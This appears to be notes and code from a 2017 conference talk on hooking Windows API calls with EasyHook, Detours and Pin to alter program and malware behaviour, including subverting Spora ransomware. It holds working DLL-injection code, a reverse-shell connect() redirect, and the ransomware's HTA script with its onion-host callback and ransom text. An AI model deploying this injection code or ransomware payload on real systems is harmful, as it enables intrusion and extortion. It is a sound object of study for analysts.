It becomes useless. It has no purpose.
It's not like we can put a debugger on the target's machine and run it alongside the program to intercept functionality. That would be just plain silly.
Interception of program events at run time. On Windows this can mean window messages (a can of worms — look it up), library calls, and function pointers. Hooking libraries do it by overwriting the first instructions of the target function with a jump to executable memory they control; the displaced instructions are kept in a 'trampoline' that runs them and jumps back into the original function when the hook is done. Simple, right?
We're going to create an 'add-user' executable and change its behavior...
#include <easyhook.h>
using namespace std;
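// Hook installed over kernel32!WinExec by NativeInjectionEntryPoint.
// The hook MUST carry WinExec's own signature — UINT WINAPI (LPCSTR, UINT) —
// because the caller pushes two arguments and, under stdcall on 32-bit, expects
// the callee to pop them; the old zero-argument BOOL version left the stack
// unbalanced on every intercepted call.
// Whatever the caller asked to run is ignored; mspaint is launched instead, and
// WinExec's own return value (instance handle > 31 on success) is passed back.
// NOTE(review): the inner WinExec call relies on EasyHook not re-entering this
// handler from inside itself — confirm for the EasyHook version in use.
UINT WINAPI BorrowWinExec(LPCSTR lpCmdLine, UINT uCmdShow)
{
    (void)lpCmdLine;
    (void)uCmdShow;
    std::cout << "Replacing WinExec call!\r\n";
    return WinExec("mspaint", SW_MAXIMIZE); // 3 == SW_MAXIMIZE: max window
}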
// Exported with C linkage and the stdcall convention; EasyHook's injector is
// expected to resolve this symbol by name once the DLL is in the target
// (NOTE(review): confirm against the EasyHook version in use).
extern "C" void __declspec(dllexport) __stdcall
NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo);
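// Runs inside the injected process: resolves kernel32!WinExec, installs
// BorrowWinExec over it and enables the hook via an exclusive thread ACL.
// inRemoteInfo: pass-through buffer from the injector; not used here.
// Every step that can fail is now checked — the old code discarded the
// LhInstallHook status and went on to set an ACL on a hook that might not exist.
void __stdcall NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo)
{
    (void)inRemoteInfo;
    HOOK_TRACE_INFO hHook = { NULL }; // handle EasyHook fills in for our hook

    HMODULE kernel32 = GetModuleHandle(TEXT("kernel32"));
    FARPROC target = kernel32 ? GetProcAddress(kernel32, "WinExec") : NULL;
    if (target == NULL)
    {
        std::cout << "Could not resolve kernel32!WinExec, not hooking.\r\n";
        return;
    }

    NTSTATUS result = LhInstallHook(target, BorrowWinExec, NULL, &hHook);
    if (FAILED(result)) // NTSTATUS failures have the high bit set
    {
        std::cout << "LhInstallHook failed, status 0x" << std::hex << result << std::dec << "\r\n";
        return;
    }

    // NOTE(review): a single ACL entry of 0 is the EasyHook sample idiom;
    // confirm which thread(s) it selects in the EasyHook version in use.
    ULONG ACLEntries[1] = { 0 };
    LhSetExclusiveACL(ACLEntries, 1, &hHook);
}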
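// Injector side: ask for a PID and push the 32-bit hook DLL into that process.
DWORD processId = 0; // stays 0 if the read fails, which the status check below reports
std::cout << "Enter a process ID: \r\n";
std::cin >> processId;

// Arrays instead of pointers to literals: RhInjectLibrary wants a writable
// WCHAR* path, and sizeof() gives the true byte size of the pass-through data.
// The old code passed &wingmsg — the address of the pointer variable — with a
// size of 64, so the target received the pointer's bytes plus whatever followed
// it on the stack rather than the message.
WCHAR wingmsg[] = L"This is filler data, don't care about sending it!";
WCHAR dllToInject[] = L"justfuckingworkalready.dll";
std::wcout << "Attempting to inject: " << dllToInject << " \r\n";
NTSTATUS nt = RhInjectLibrary(
    processId,               // the process to inject into
    0,                       // ThreadId to wake up upon injection
    EASYHOOK_INJECT_DEFAULT,
    dllToInject,             // 32-bit DLL
    NULL,                    // 64-bit DLL not provided
    wingmsg,                 // data handed to the injected DLL's entry point
    (ULONG)sizeof(wingmsg)   // its exact size in bytes
);
if (nt != 0) // STATUS_SUCCESS is 0; anything else is a failure status
{
    std::cout << "Injection failed, status 0x" << std::hex << nt << std::dec << "\r\n";
}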
A reverse-shell payload that connects back to 10.10.10.10 on port 802, written out as an .exe — this is the binary whose connect() call the detour below redirects.
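// Pointer to the real connect(); Detours swaps it for the trampoline on attach.
extern "C" int (WINAPI * Real_connect)(SOCKET, const struct sockaddr*, int) = connect;

// Replacement for connect(): whatever address the caller supplied is ignored and
// the socket is connected to 127.0.0.1:27015 instead, so the reverse shell phones
// home to a local listener rather than 10.10.10.10:802.
// s:       the caller's socket, passed through untouched.
// name/namelen: the caller's destination — deliberately discarded.
// Returns the real connect()'s result for the redirected address.
int WINAPI Detour_connect(SOCKET s, const struct sockaddr* name, int namelen)
{
    (void)name;
    (void)namelen;

    struct sockaddr_in redirect;
    memset(&redirect, 0, sizeof(redirect)); // also zeroes sin_zero
    redirect.sin_family = AF_INET;
    redirect.sin_addr.s_addr = inet_addr("127.0.0.1");
    redirect.sin_port = htons(27015);

    // Pass our own struct's size, not the caller's namelen: a caller handing in a
    // larger sockaddr (e.g. IPv6) would otherwise make connect() read past
    // the end of `redirect`.
    return Real_connect(s, (const struct sockaddr*)&redirect, (int)sizeof(redirect)); // detoured now!
}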
Pin is a cross-platform dynamic binary instrumentation framework from Intel: it lets you modify (or instrument) programs while they run — add functionality, debug, trace, or just plain mess with them.
The same concept as Intel's PIN
Just free and open source. And with shittier documentation and samples. Also cross platform.
For simplicity's sake I will be making use of PIN.
#include <windows.h>
#include <stdio.h>
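// Victim program for the Pin demo: deletes every file in the current directory
// whose name starts with "kevin-spacey", reporting each one, then waits for a
// keypress. Uses the explicit ANSI entry points so it calls the DeleteFileA the
// Pin tool hooks regardless of the project's UNICODE setting, and so the
// printf("%s") of cFileName stays correct.
int main(void)
{
    // (ASCII-art cactus omitted for brevity)
    WIN32_FIND_DATAA fd;
    HANDLE hFind = FindFirstFileA("kevin-spacey*", &fd);
    if (hFind != INVALID_HANDLE_VALUE)
    {
        do
        {
            printf("Deleting file %s \r\n", fd.cFileName);
            if (!DeleteFileA(fd.cFileName))
            {
                // Previously a failed delete was indistinguishable from success.
                printf("  (DeleteFile failed, error %lu)\r\n", GetLastError());
            }
        } while (FindNextFileA(hFind, &fd));
        FindClose(hFind);
    }
    printf("And gone!\r\n");
    getchar();
    return 9; // exit status kept as-is from the original; presumably just a marker
}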
#include "pin.H"
#include <iostream>
// Windows.h is pulled into its own namespace, presumably to keep its names from
// colliding with Pin's; its functions are then used as WINDOWS::Xxx (see the
// WINDOWS::Sleep call below). Macros such as WINAPI and TRUE ignore the namespace.
namespace WINDOWS
{
#include<Windows.h>
}
using namespace std;
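// Type of the real DeleteFileA handed to the replacement via IARG_ORIG_FUNCPTR.
// DeleteFileA is a WINAPI (stdcall on 32-bit) function returning BOOL; calling it
// through the old cdecl, void-returning pointer unbalanced the stack on x86 and
// threw its result away.
typedef BOOL (WINAPI * ORIG_FILE_DEL)(char *);

// Replacement for DeleteFileA, installed by ImageLoad.
// orig_pte: the original DeleteFileA.
// dafile:   the path the application asked to delete (may be NULL).
// Returns the BOOL the application sees: TRUE (a deliberate lie) for anything
// containing "kevin-spacey", which is left untouched; otherwise the real
// DeleteFileA's own result.
BOOL DontDeleteEverything(ORIG_FILE_DEL orig_pte, char *dafile)
{
    cout << "I see a file to be deleted: " << (dafile ? dafile : "(null)") << endl;
    WINDOWS::Sleep(1000); // slow the demo down enough to watch

    if (dafile != NULL && strstr(dafile, "kevin-spacey") != NULL)
    {
        cout << "NOOOOOOO, LEAVE SPACEY ALONE! " << endl;
        // Feed the original a name that does not exist so the real file survives,
        // then report success so the caller believes the delete went through.
        orig_pte("nowayjose");
        return TRUE;
    }

    cout << "Whatever man... " << endl;
    // Propagate the real result; the old code returned FALSE even when the
    // delete succeeded.
    return orig_pte(dafile);
}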
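// Image-load callback: in every image that exports DeleteFileA, replace it with
// DontDeleteEverything. The replacement receives the original function pointer
// and the first argument (the path) per the prototype below.
// v: unused user data from IMG_AddInstrumentFunction.
VOID ImageLoad( IMG img, VOID *v )
{
    (void)v;
    // An ANSI build's DeleteFile resolves to DeleteFileA, which is what the
    // victim program calls; a UNICODE build would need DeleteFileW here.
    RTN rtn = RTN_FindByName( img, "DeleteFileA" );
    if (!RTN_Valid(rtn))
    {
        return;
    }
    cout << "Replacing DeleteFile in " << IMG_Name(img) << endl;

    // DeleteFileA is WINAPI, i.e. stdcall on 32-bit Windows, so describe it as
    // such; CALLINGSTD_DEFAULT would have Pin treat the call as cdecl and leave
    // the argument on the stack.
    PROTO proto_delfile = PROTO_Allocate( PIN_PARG(BOOL), CALLINGSTD_STDCALL,
                                          "DeleteFileA", PIN_PARG(char *), PIN_PARG_END() );
    RTN_ReplaceSignatureProbed(rtn, AFUNPTR(DontDeleteEverything), IARG_PROTOTYPE,
                               proto_delfile, IARG_ORIG_FUNCPTR,
                               IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);
    PROTO_Free( proto_delfile );
}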
// Print the tool's one-line purpose plus Pin's knob summary to stderr.
// Always returns -1 so PIN_Init's failure path can simply `return Usage();`.
INT32 Usage()
{
    const char *blurb = "This tool ensures that file deletion never deletes everything.";
    cerr << blurb << endl
         << endl
         << KNOB_BASE::StringKnobSummary() << endl;
    return -1;
}
// Pin tool entry point: load symbols, parse Pin's command line, register the
// image-load hook and start the target in probe mode.
int main( INT32 argc, CHAR *argv[] )
{
    PIN_InitSymbols();

    const bool badArgs = (PIN_Init(argc, argv) != 0);
    if (badArgs)
    {
        return Usage();
    }

    IMG_AddInstrumentFunction( ImageLoad, 0 );
    PIN_StartProgramProbed(); // presumably does not return on success
    return 0;
}
What's not to like about PIN? It makes everything HUGE. 4 MB for a DLL file plus another 16 MB for the launcher. EasyHook only clocks in at 427kb (launcher + dll). Detours is tiny at a 136kb all included. Size matters.
Sometimes they don't even PACK or ENCRYPT the thing.
File is a downloader and not well liked it seems.
File downloads from http://191.252.2.93 and opens a zip file and then executes the stuff within.
There exist many free editors for the jar file of varying degrees of usefulness.
Since a 'jar file' is just a ZIP archive (not LZMA) with '.class' files inside, it's trivial to remove classes.
The best one is DirtyJoe.
Hits close to home.
Honorable Mention is Class Editor.
Your computer has been blocked using the Spora virus. There was a connection problem! <br> <br> To recover, write to the mail: [email protected] Or, try to connect again after 1 hour by restarting the computer
The result: everything the ransomware encrypts can then be unlocked only with MY private key.
#include "stdafx.h"
#include <windows.h>
#include <detours.h>
#include <cstring>
#include <string>
#include <Shlwapi.h>
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "detours.lib")
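// Pointer to the real WriteFile; Detours swaps it for the trampoline on attach.
extern "C" BOOL (WINAPI * Real_Write_File)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED) = WriteFile;

// Replacement for WriteFile. Every write is passed straight through except two
// files the ransomware produces, identified by the handle's final path:
//   * "HOW TO DECRYPT FILES.txt" - the ransom note is swapped for our own text;
//   * any ".hta" file            - the HTA page is swapped for our own page.
// In both cases the caller's buffer AND byte count are replaced wholesale, so
// *numbyteswritten reports the substitute's length, not numbytes2write.
// Parameters and return value mirror WriteFile; the return is whatever the real
// WriteFile reported for the write that actually happened.
BOOL WINAPI Detour_WriteFile(HANDLE passedhandle, LPCVOID lpBuffer,
    DWORD numbytes2write, LPDWORD numbyteswritten, LPOVERLAPPED lpOverlapped)
{
    // Explicit W entry points: the comparisons below use wide literals, so the
    // API choice must not depend on the project's UNICODE setting.
    WCHAR buf[MAX_PATH + 1];
    DWORD sz = GetFinalPathNameByHandleW(passedhandle, buf, MAX_PATH, 0);
    // sz == 0: not a file handle (pipe, console, ...) or the lookup failed.
    // sz > MAX_PATH: the buffer was too small and sz is the *required* size; the
    //   old unconditional "buf[sz] = 0" then wrote past the end of the array.
    // Either way the write is none of our business.
    if (sz == 0 || sz > MAX_PATH)
    {
        return Real_Write_File(passedhandle, lpBuffer, numbytes2write, numbyteswritten, lpOverlapped);
    }
    buf[sz] = 0;

    // Windows file names are case-insensitive, so compare them that way.
    const WCHAR *pathfilename = PathFindFileNameW(buf);
    if (_wcsicmp(pathfilename, L"HOW TO DECRYPT FILES.txt") == 0)
    {
        const char *screw =
            "Attention! All your files are belong \r\n"
            "to us! If you want these files back,\r\n"
            "send 1 BTC to the address:\r\n"
            "1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR\r\n"
            "then send an email to\r\n"
            "[email protected] with the subject:\r\n"
            "CactusCon 2017\r\n"
            "Then I'll send the decryption key.\r\n"
            " \r\n"
            " /|\\\r\n"
            " |||||\r\n"
            " |||||\r\n"
            " /\\ |||||\r\n"
            "|||| |||||\r\n"
            "|||| ||||| /\\\r\n"
            "|||| ||||| ||||\r\n"
            " \\|`-'|||| ||||\r\n"
            " \\__ |||| ||||\r\n"
            " ||||`-'|||\r\n"
            " |||| ___/\r\n"
            " |||||\r\n"
            " |||||\r\n"
            "-----------------\r\n";
        return Real_Write_File(passedhandle, screw, (DWORD)strlen(screw), numbyteswritten, lpOverlapped);
    }

    const WCHAR *exten = PathFindExtensionW(buf);
    if (_wcsicmp(exten, L".hta") == 0)
    {
        // Substitute HTA page (kept byte-for-byte from the original, joined back onto one line).
        const char *me = "<hta:application showInTaskbar=\"no\" innerBorder=\"no\" navigable=\"no\" scroll=\"no\" border=\"none\" caption=\"none\"><html><body><script language='JScript'>t = new ActiveXObject('WScript.Shell').ExpandEnvironmentStrings('%temp%');f = new ActiveXObject('Scripting.FileSystemObject');c = new ActiveXObject('ADODB.Stream');if(!f.FileExists(t+'\\icon_2.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAMAAADXqc3KAAABp1BMVEVMaXHyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgD////yqwDyqQDxpQDxpgDyqADxpADwngDxogD//fn//vzyrAH3zGf63Zr64qf868L87MX87sr++e7++u///v3///7xoQDypwDyqwHyqwLyrADyrALyrAPyrQXyrQrzrgXzrgbzrwbzrwfzrwjzsRDzsBjzshP0tBn0tCH0tR70tiH0uCT0tyz0uCf0uCj1vDT1vjj1vT71vzz1v0n1wUL1wUb2wkX2w0r2x1X3yFj3yVz3y2f3zGX3zGb3zmv40G/40HT40XP40Xb40Xf40Xj40nj51YL514j52Iv52Y3525L63Zn635/636D64qb746r75rX757b87MT87Mb87cj8787978/979D979L98NP98df99eH++Ov++vL++/P+/PT//PX//Pb//Pf//vslsX0oAAAAKHRSTlMAAQMjJCUmKitcXV5fdXZ8fYGCnp+io6TDxMbH7O7v8PHy9fb7/P3+2lfZUwAAAZhJREFUKM9FktV2G0EQRFurxFYMUZzYSUwyaWduz4IoZgozMzMzMzN9dB52FPdj1zndp+qWiIgEOSms7i9ZM9jXVZBcIH4Cya8dwwJYxtYtk6C5bxvGGmNx1hjLSEemBNKJCS2QVqIIGxpWSiASSDuhgYj06P2dGxyYkA4JRFqGMMCmrdV7P/e9vx47DEMtItJNGVz8YO7xl6mTejreAmW6RVpHsODSc9M6v6CNm5tTh2WkVYoYAFc71tCJyR/68WDqMKyS9V6Ix3V2f+3UrD6NHYZeGcicufiZvkkrO77qy8RhGZAy2bhPWv88+UH/XEwcEHrBJUd+68Tz76oPKw6g7E9F2y7pr0O1XS+0fsaf6sVAtPf1W51JNlbPqt6qZM+LGFx8TRv67dGVy+9ULyQOQ9Eb3HP87t+5BdV5fQWZQVlDGVg8ryemZ+48Gd8e+UhkeQmDS25MHahfrSZxhA8xkDaMAdzu24cjH3t7BsSDiioRYENDZxOhR+sywMMrlqDne0abZRjtyctSTXJS6OobNKbU/78+/wBwgVrMmlG5mwAAAABJRU5ErkJggg==';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_2.png', 2),c.close();}if(!f.FileExists(t+'\\icon_3.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_3.png', 2),c.close();}if(!f.FileExists(t+'\\icon_4.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_4.png', 2),c.close();}if(!f.FileExists(t+'\\icon_5.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_5.png', 2),c.close();}</script><script>window.resizeTo(screen.availWidth*0.95,screen.availHeight*0.95);window.moveTo(screen.availWidth*0.025,screen.availHeight*0.025);r=\"<center><br><br><h1>You have been owned by AverageJoe</h1><br><br><h2> CactusCon 2017 baby!</h2><br><br><h3>oh and pay me BTC. Send them to 1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR and email [email protected] when done</h3><center>\";d=\"http://5pr6hirtlfan3j76.onion/\";try{h=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");h.setProxy(2,\"31.192.105.180:8123\",0);h.setTimeouts(10000,10000,60000,60000);h.open(\"POST\",d+\"?\"+Math.random(),0);h.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");h.send('key=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');document.write(h.responseText);}catch(e){document.write(r);}</script></body></html><div style='height:0;display:none'>";
        return Real_Write_File(passedhandle, me, (DWORD)strlen(me), numbyteswritten, lpOverlapped);
    }

    return Real_Write_File(passedhandle, lpBuffer, numbytes2write, numbyteswritten, lpOverlapped);
}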
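// Exported filler: spins 20345 times shuffling registers and has no observable
// effect. The original ended its asm with a `pop ebx` that had no matching push,
// i.e. it consumed a stack slot it never pushed; that instruction is gone.
// The asm block only exists on 32-bit MSVC (`_asm` is unavailable on x64), so a
// plain spin of the same count stands in elsewhere.
extern "C" __declspec(dllexport) void DoNothingAlready(void)
{
    DWORD ayylmao = 20345; // iteration count
#if defined(_M_IX86)
    _asm
    {
        xor eax, eax
        xor ecx, ecx
        mov eax, ayylmao
        mov ecx, 0
    testd:
        mov edx, 234
        xchg edx, ebx
        xor ebx, ebx
        inc ecx
        cmp eax, ecx
        jnz testd
        nop
    }
#else
    for (volatile DWORD i = 0; i < ayylmao; ++i)
    {
        // burn the same number of iterations
    }
#endif
}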
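// DLL entry point: attach the WriteFile detour on process attach and remove it on
// process detach. When Detours reports that this is its own helper process,
// nothing is installed.
// Returns FALSE (so the loader refuses the DLL) if the hook cannot be attached;
// the old code discarded DetourTransactionCommit's result, so a failed hook left
// the process running unprotected with no indication at all.
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)
{
    (void)hinst;
    (void)reserved;

    if (DetourIsHelperProcess()) {
        return TRUE;
    }

    if (dwReason == DLL_PROCESS_ATTACH) {
        DetourRestoreAfterWith();
        DetourTransactionBegin();
        DetourUpdateThread(GetCurrentThread());
        DetourAttach(&(PVOID&)Real_Write_File, Detour_WriteFile);
        LONG error = DetourTransactionCommit(); // also reports a failed DetourAttach
        if (error != NO_ERROR) {
            std::string msg = "Detour_WriteFile attach failed, error " + std::to_string(error) + "\n";
            OutputDebugStringA(msg.c_str());
            return FALSE; // refuse to load rather than run without the hook
        }
    }
    else if (dwReason == DLL_PROCESS_DETACH) {
        DetourTransactionBegin();
        DetourUpdateThread(GetCurrentThread());
        DetourDetach(&(PVOID&)Real_Write_File, Detour_WriteFile);
        LONG error = DetourTransactionCommit();
        if (error != NO_ERROR) {
            // Nothing useful can be done while unloading; at least say so.
            OutputDebugStringA("Detour_WriteFile detach failed\n");
        }
    }
    return TRUE;
}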